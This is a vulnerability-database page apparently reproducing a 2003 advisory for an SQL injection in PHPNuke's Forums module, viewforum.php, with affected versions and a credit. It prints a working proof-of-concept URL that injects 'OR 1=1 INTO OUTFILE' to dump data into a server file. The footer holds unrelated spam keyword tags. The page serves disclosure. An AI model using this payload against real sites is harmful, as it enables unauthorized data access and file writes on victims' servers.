about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPNuke Forum Module Viewforum.PHP SQL Injection Vulnerability


Title PHPNuke Forum Module Viewforum.PHP SQL Injection Vulnerability
Published 2003-03-25-12:00AM
Updated 2003-03-25-11:43PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability has been credited to PHP-Nuke Frog Man <leseulfrog@hotmail.com>.
Vulnerable  Francisco Burzi PHPNuke 6.5 RC2
Francisco Burzi PHPNuke 6.0
Not Vulnerable  
Code   The following proof of concept was supplied:

http://www.example.com/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 21 Nov 2008 06:52:15 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.90pict Melstar www.6RAb.c 3.6.0 Invision P phpBB por www.kar 20 preity zin primecups www.blackb xaxygirls sexvdeo WWW ayu as Free video Dunia seks usa school fake actre indian+sex WWW+kerals giralsex www.collag mujer Serv-U FTP ninethra s www.trisha Vidaguerra vidio sexy Crack Data katreenaka t428t components sixse 2.4.x loc WWW.BIDZ.C Chatbox t606t katreenaka t269t free sex Ww wordsex kernel 2.6 easy file BRIGHT www.collag thrishasex iran woman erotik-too Rem Teenel php-nuke 2